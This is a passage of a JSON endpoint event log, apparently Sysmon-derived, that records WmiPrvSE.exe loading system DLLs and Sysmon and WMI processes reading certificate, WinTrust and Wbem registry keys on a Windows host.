"pid": 4036, - "process_name": 
"WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573488860000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiPrvSE.exe", - "image_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "fastprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": 
"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wbemcomn.dll", - "image_path": "C:\\Windows\\System32\\wbemcomn.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489020000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_value": "Wbem", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem", - "registry_value": "Wbem", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": 
"{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
